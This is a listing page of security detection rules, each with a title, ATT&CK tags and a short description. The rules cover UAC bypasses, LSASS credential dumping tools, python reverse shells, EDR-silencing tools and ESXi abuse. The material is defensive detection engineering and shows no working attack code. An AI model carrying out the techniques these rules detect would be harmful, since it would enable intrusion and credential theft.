    Share on: twitter facebook linkedin copy

    Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges


    Read More
  • Possible Privilege Escalation via Weak Service Permissions

    calendar Dec 1, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574.011  ·
    Share on: twitter facebook linkedin copy

    Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand


    Read More
  • Potential CVE-2021-41379 Exploitation Attempt

    calendar Dec 1, 2024 · attack.privilege-escalation attack.t1068 cve.2021-41379 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights


    Read More
  • Potential Privilege Escalation via Service Permissions Weakness

    calendar Dec 1, 2024 · attack.privilege-escalation attack.t1574.011  ·
    Share on: twitter facebook linkedin copy

    Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level


    Read More
  • Potential RDP Session Hijacking Activity

    calendar Dec 1, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects potential RDP Session Hijacking activity on Windows systems


    Read More
  • Potential UAC Bypass Via Sdclt.EXE

    calendar Dec 1, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.


    Read More
  • Suspicious Child Process Created as System

    calendar Dec 1, 2024 · attack.privilege-escalation attack.t1134.002  ·
    Share on: twitter facebook linkedin copy

    Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts


    Read More
  • Suspicious High IntegrityLevel Conhost Legacy Option

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1202  ·
    Share on: twitter facebook linkedin copy

    ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.


    Read More
  • Suspicious Process By Web Server Process

    calendar Dec 1, 2024 · attack.persistence attack.t1505.003 attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation


    Read More
  • Suspicious RazerInstaller Explorer Subprocess

    calendar Dec 1, 2024 · attack.privilege-escalation attack.t1553 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM


    Read More
  • Suspicious Scheduled Task Creation via Masqueraded XML File

    calendar Dec 1, 2024 · attack.defense-evasion attack.persistence attack.t1036.005 attack.t1053.005  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence


    Read More
  • Suspicious SYSTEM User Process Creation

    calendar Dec 1, 2024 · attack.credential-access attack.defense-evasion attack.privilege-escalation attack.t1134 attack.t1003 attack.t1027  ·
    Share on: twitter facebook linkedin copy

    Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)


    Read More
  • UAC Bypass Abusing Winsat Path Parsing - Process

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)


    Read More
  • UAC Bypass Tools Using ComputerDefaults

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)


    Read More
  • UAC Bypass Using ChangePK and SLUI

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)


    Read More
  • UAC Bypass Using Consent and Comctl32 - Process

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)


    Read More
  • UAC Bypass Using Disk Cleanup

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)


    Read More
  • UAC Bypass Using DismHost

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)


    Read More
  • UAC Bypass Using IDiagnostic Profile

    calendar Dec 1, 2024 · attack.execution attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the "IDiagnosticProfileUAC" UAC bypass technique


    Read More
  • UAC Bypass Using IEInstal - Process

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)


    Read More
  • UAC Bypass Using MSConfig Token Modification - Process

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)


    Read More
  • UAC Bypass Using NTFS Reparse Point - Process

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)


    Read More
  • UAC Bypass Using PkgMgr and DISM

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)


    Read More
  • UAC Bypass Using Windows Media Player - Process

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)


    Read More
  • UAC Bypass WSReset

    calendar Dec 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config


    Read More
  • Setup16.EXE Execution With Custom .Lst File

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1574.005  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file. These ".lst" file can contain references to external program that "Setup16.EXE" will execute. Attackers and adversaries might leverage this as a living of the land utility.


    Read More
  • Suspicious ShellExec_RunDLL Call Via Ordinal

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1218.011  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.


    Read More
  • Suspicious Usage Of ShellExec_RunDLL

    calendar Dec 1, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack


    Read More
  • Password Policy Discovery - Linux

    calendar Dec 1, 2024 · attack.discovery attack.t1201  ·
    Share on: twitter facebook linkedin copy

    Detects password policy discovery commands


    Read More
  • File and Directory Discovery - Linux

    calendar Dec 1, 2024 · attack.discovery attack.t1083  ·
    Share on: twitter facebook linkedin copy

    Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.


    Read More
  • System Owner or User Discovery - Linux

    calendar Dec 1, 2024 · attack.discovery attack.t1033  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.


    Read More
  • All Rules Have Been Deleted From The Windows Firewall Configuration

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    Detects when a all the rules have been deleted from the Windows Defender Firewall configuration


    Read More
  • CodePage Modification Via MODE.COM To Russian Language

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1036  ·
    Share on: twitter facebook linkedin copy

    Detects a CodePage modification using the "mode.com" utility to Russian language. This behavior has been used by threat actors behind Dharma ransomware.


    Read More
  • CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process

    calendar Dec 1, 2024 · detection.emerging-threats attack.execution attack.t1203 cve.2023-38331  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.


    Read More
  • GCP Access Policy Deleted

    calendar Dec 1, 2024 · attack.persistence attack.privilege-escalation attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource.


    Read More
  • GCP Break-glass Container Workload Deployed

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1548  ·
    Share on: twitter facebook linkedin copy

    Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.


    Read More
  • Google Workspace Application Access Level Modified

    calendar Dec 1, 2024 · attack.persistence attack.privilege-escalation attack.t1098.003  ·
    Share on: twitter facebook linkedin copy

    Detects when an access level is changed for a Google workspace application. An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google workspace resources.


    Read More
  • HackTool - EDRSilencer Execution - Filter Added

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1562  ·
    Share on: twitter facebook linkedin copy

    Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.


    Read More
  • HackTool - SharpMove Tool Execution

    calendar Dec 1, 2024 · attack.lateral-movement attack.t1021.002  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.


    Read More
  • HackTool - SOAPHound Execution

    calendar Dec 1, 2024 · attack.discovery attack.t1087  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.


    Read More
  • Peach Sandstorm APT Process Activity Indicators

    calendar Dec 1, 2024 · attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects process creation activity related to Peach Sandstorm APT


    Read More
  • Potential Dropper Script Execution Via WScript/CScript

    calendar Dec 1, 2024 · attack.execution attack.t1059.005 attack.t1059.007  ·
    Share on: twitter facebook linkedin copy

    Detects wscript/cscript executions of scripts located in user directories


    Read More
  • Potential Peach Sandstorm APT C2 Communication Activity

    calendar Dec 1, 2024 · attack.command-and-control detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential C2 communication activity related to Peach Sandstorm APT


    Read More
  • Potential Persistence Via MyComputer Registry Keys

    calendar Dec 1, 2024 · attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)


    Read More
  • Potential Pikabot C2 Activity

    calendar Dec 1, 2024 · attack.command-and-control attack.t1573 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of rundll32 that leads to an external network connection. The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.


    Read More
  • Potential Pikabot Discovery Activity

    calendar Dec 1, 2024 · attack.discovery attack.t1016 attack.t1049 attack.t1087 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups. The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).


    Read More
  • Potential Pikabot Hollowing Activity

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1055.012 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries


    Read More
  • Potentially Suspicious Self Extraction Directive File Created

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stand for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple ini files and not PE binaries.


    Read More
  • PowerShell Core DLL Loaded By Non PowerShell Process

    calendar Dec 1, 2024 · attack.t1059.001 attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.


    Read More
  • PUA - PingCastle Execution

    calendar Dec 1, 2024 · attack.reconnaissance attack.t1595  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.


    Read More
  • PUA - PingCastle Execution From Potentially Suspicious Parent

    calendar Dec 1, 2024 · attack.reconnaissance attack.t1595  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.


    Read More
  • Remote CHM File Download/Execution Via HH.EXE

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1218.001  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.


    Read More
  • Remote Thread Creation In Mstsc.Exe From Suspicious Location

    calendar Dec 1, 2024 · attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials.


    Read More
  • Renamed PingCastle Binary Execution

    calendar Dec 1, 2024 · attack.execution attack.t1059 attack.defense-evasion attack.t1202  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.


    Read More
  • Self Extraction Directive File Created In Potentially Suspicious Location

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.


    Read More
  • Suspicious Processes Spawned by Java.EXE

    calendar Dec 1, 2024 · attack.initial-access attack.persistence attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)


    Read More
  • System Control Panel Item Loaded From Uncommon Location

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1036  ·
    Share on: twitter facebook linkedin copy

    Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.


    Read More
  • System Disk And Volume Reconnaissance Via Wmic.EXE

    calendar Dec 1, 2024 · attack.execution attack.discovery attack.t1047 attack.t1082  ·
    Share on: twitter facebook linkedin copy

    An adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the wmic command-line utility and has been observed being used by threat actors such as Volt Typhoon.


    Read More
  • Uncommon Connection to Active Directory Web Services

    calendar Dec 1, 2024 · attack.discovery attack.t1087  ·
    Share on: twitter facebook linkedin copy

    Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.


    Read More
  • Windows Filtering Platform Blocked Connection From EDR Agent Binary

    calendar Dec 1, 2024 · attack.defense-evasion attack.t1562  ·
    Share on: twitter facebook linkedin copy

    Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.


    Read More
  • Creation of WerFault.exe/Wer.dll in Unusual Folder

    calendar Nov 29, 2024 · attack.persistence attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.


    Read More
  • GALLIUM IOCs

    calendar Nov 25, 2024 · attack.credential-access attack.command-and-control attack.t1212 attack.t1071 attack.g0093 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.


    Read More
  • HackTool - CoercedPotato Execution

    calendar Nov 25, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055  ·
    Share on: twitter facebook linkedin copy

    Detects the use of CoercedPotato, a tool for privilege escalation


    Read More
  • HackTool - CreateMiniDump Execution

    calendar Nov 25, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine


    Read More
  • HackTool - GMER Rootkit Detector and Remover Execution

    calendar Nov 25, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the execution GMER tool based on image and hash fields.


    Read More
  • HackTool - HandleKatz LSASS Dumper Execution

    calendar Nov 25, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same


    Read More
  • HackTool - Impersonate Execution

    calendar Nov 25, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1134.001 attack.t1134.003  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively


    Read More
  • HackTool - LocalPotato Execution

    calendar Nov 25, 2024 · attack.defense-evasion attack.privilege-escalation cve.2023-21746  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples


    Read More
  • HackTool - PCHunter Execution

    calendar Nov 25, 2024 · attack.execution attack.discovery attack.t1082 attack.t1057 attack.t1012 attack.t1083 attack.t1007  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff


    Read More
  • HackTool - PPID Spoofing SelectMyParent Tool Execution

    calendar Nov 25, 2024 · attack.defense-evasion attack.t1134.004  ·
    Share on: twitter facebook linkedin copy

    Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent


    Read More
  • HackTool - SharpEvtMute DLL Load

    calendar Nov 25, 2024 · attack.defense-evasion attack.t1562.002  ·
    Share on: twitter facebook linkedin copy

    Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs


    Read More
  • HackTool - Stracciatella Execution

    calendar Nov 25, 2024 · attack.execution attack.defense-evasion attack.t1059 attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.


    Read More
  • HackTool - SysmonEOP Execution

    calendar Nov 25, 2024 · cve.2022-41120 attack.t1068 attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120


    Read More
  • HackTool - UACMe Akagi Execution

    calendar Nov 25, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata


    Read More
  • HackTool - Windows Credential Editor (WCE) Execution

    calendar Nov 25, 2024 · attack.credential-access attack.t1003.001 attack.s0005  ·
    Share on: twitter facebook linkedin copy

    Detects the use of Windows Credential Editor (WCE)


    Read More
  • Hacktool Execution - Imphash

    calendar Nov 25, 2024 · attack.credential-access attack.t1588.002 attack.t1003  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed


    Read More
  • HackTool Named File Stream Created

    calendar Nov 25, 2024 · attack.defense-evasion attack.s0139 attack.t1564.004  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a named file stream with the imphash of a well-known hack tool


    Read More
  • Malicious DLL Load By Compromised 3CXDesktopApp

    calendar Nov 25, 2024 · attack.defense-evasion detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp


    Read More
  • MpiExec Lolbin

    calendar Nov 25, 2024 · attack.execution attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary


    Read More
  • Potential Compromised 3CXDesktopApp Execution

    calendar Nov 25, 2024 · attack.defense-evasion attack.t1218 attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects execution of known compromised version of 3CXDesktopApp


    Read More
  • Potential SquiblyTwo Technique Execution

    calendar Nov 25, 2024 · attack.defense-evasion attack.t1047 attack.t1220 attack.execution attack.t1059.005 attack.t1059.007  ·
    Share on: twitter facebook linkedin copy

    Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields


    Read More
  • PUA - Fast Reverse Proxy (FRP) Execution

    calendar Nov 25, 2024 · attack.command-and-control attack.t1090  ·
    Share on: twitter facebook linkedin copy

    Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.


    Read More
  • PUA - Nimgrab Execution

    calendar Nov 25, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.


    Read More
  • PUA - NPS Tunneling Tool Execution

    calendar Nov 25, 2024 · attack.command-and-control attack.t1090  ·
    Share on: twitter facebook linkedin copy

    Detects the use of NPS, a port forwarding and intranet penetration proxy server


    Read More
  • PUA - Process Hacker Driver Load

    calendar Nov 25, 2024 · attack.privilege-escalation cve.2021-21551 attack.t1543  ·
    Share on: twitter facebook linkedin copy

    Detects driver load of the Process Hacker tool


    Read More
  • PUA - Process Hacker Execution

    calendar Nov 25, 2024 · attack.defense-evasion attack.discovery attack.persistence attack.privilege-escalation attack.t1622 attack.t1564 attack.t1543  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.


    Read More
  • PUA - System Informer Driver Load

    calendar Nov 25, 2024 · attack.privilege-escalation attack.t1543  ·
    Share on: twitter facebook linkedin copy

    Detects driver load of the System Informer tool


    Read More
  • PUA - System Informer Execution

    calendar Nov 25, 2024 · attack.persistence attack.privilege-escalation attack.discovery attack.defense-evasion attack.t1082 attack.t1564 attack.t1543  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations


    Read More
  • PUA- IOX Tunneling Tool Execution

    calendar Nov 25, 2024 · attack.command-and-control attack.t1090  ·
    Share on: twitter facebook linkedin copy

    Detects the use of IOX - a tool for port forwarding and intranet proxy purposes


    Read More
  • Remote Access Tool - NetSupport Execution From Unusual Location

    calendar Nov 25, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files')


    Read More
  • Renamed AdFind Execution

    calendar Nov 25, 2024 · attack.discovery attack.t1018 attack.t1087.002 attack.t1482 attack.t1069.002  ·
    Share on: twitter facebook linkedin copy

    Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.


    Read More
  • Renamed AutoIt Execution

    calendar Nov 25, 2024 · attack.defense-evasion attack.t1027  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.


    Read More
  • Renamed NetSupport RAT Execution

    calendar Nov 25, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings


    Read More
  • Renamed PAExec Execution

    calendar Nov 25, 2024 · attack.defense-evasion attack.t1202  ·
    Share on: twitter facebook linkedin copy

    Detects execution of renamed version of PAExec. Often used by attackers


    Read More
  • Vulnerable HackSys Extreme Vulnerable Driver Load

    calendar Nov 25, 2024 · attack.privilege-escalation attack.t1543.003  ·
    Share on: twitter facebook linkedin copy

    Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors


    Read More
  • Vulnerable WinRing0 Driver Load

    calendar Nov 25, 2024 · attack.privilege-escalation attack.t1543.003  ·
    Share on: twitter facebook linkedin copy

    Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation


    Read More
  • WinDivert Driver Load

    calendar Nov 25, 2024 · attack.collection attack.defense-evasion attack.t1599.001 attack.t1557.001  ·
    Share on: twitter facebook linkedin copy

    Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows


    Read More
  • ESXi Account Creation Via ESXCLI

    calendar Nov 20, 2024 · attack.persistence attack.t1136  ·
    Share on: twitter facebook linkedin copy

    Detects user account creation on ESXi system via esxcli


    Read More
  • ESXi Admin Permission Assigned To Account Via ESXCLI

    calendar Nov 20, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.


    Read More
  • ESXi Network Configuration Discovery Via ESXCLI

    calendar Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.


    Read More
  • ESXi Storage Information Discovery Via ESXCLI

    calendar Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.


    Read More
  • ESXi Syslog Configuration Change Via ESXCLI

    calendar Nov 20, 2024 · attack.defense-evasion attack.t1562.001 attack.t1562.003  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the ESXi syslog configuration via "esxcli"


    Read More
  • ESXi System Information Discovery Via ESXCLI

    calendar Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.


    Read More
  • ESXi VM Kill Via ESXCLI

    calendar Nov 20, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.


    Read More
  • ESXi VM List Discovery Via ESXCLI

    calendar Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.


    Read More
  • ESXi VSAN Information Discovery Via ESXCLI

    calendar Nov 20, 2024 · attack.discovery attack.t1033 attack.t1007  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.


    Read More
  • App Assigned To Azure RBAC/Microsoft Entra Role

    calendar Nov 20, 2024 · attack.persistence attack.privilege-escalation attack.t1098.003  ·
    Share on: twitter facebook linkedin copy

    Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.


    Read More
  • Potential File Extension Spoofing Using Right-to-Left Override

    calendar Nov 18, 2024 · attack.execution attack.defense-evasion attack.t1036.002  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.


    Read More
  • Potentially Suspicious Cabinet File Expansion

    calendar Nov 17, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks


    Read More
  • Python Reverse Shell Execution Via PTY And Socket Modules

    calendar Nov 4, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.


    Read More
  • Python Spawning Pretty TTY Via PTY Module

    calendar Nov 4, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.


    Read More
  • Antivirus Exploitation Framework Detection

    calendar Nov 4, 2024 · attack.execution attack.t1203 attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

